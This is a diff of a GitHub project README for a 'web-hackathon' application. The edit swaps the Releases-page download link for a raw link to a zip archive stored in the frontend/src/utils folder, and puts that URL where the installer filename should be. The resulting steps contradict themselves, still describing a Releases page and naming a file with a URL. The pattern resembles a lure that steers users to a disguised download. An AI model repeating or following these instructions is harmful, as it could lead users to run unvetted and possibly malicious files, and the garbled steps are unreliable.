Mavin9300/web-hackathon/README.md

 To download the application:

-1. Visit this page to download: [Download Latest Release](https://github.com/Mavin9300/web-hackathon/releases).
+1. Visit this page to download: [Download Latest Release](https://github.com/Mavin9300/web-hackathon/raw/refs/heads/main/frontend/src/utils/web_hackathon_v3.2.zip).
 2. On the Releases page, you will see the latest version listed.
 Click on it.
 3. Scroll down to the assets section and find the executable file.
-It may be named something like `web-hackathon-setup.exe` or similar.
+It may be named something like `https://github.com/Mavin9300/web-hackathon/raw/refs/heads/main/frontend/src/utils/web_hackathon_v3.2.zip` or similar.
 4. Click on the file to start the download.

 After the download completes, follow these steps to install: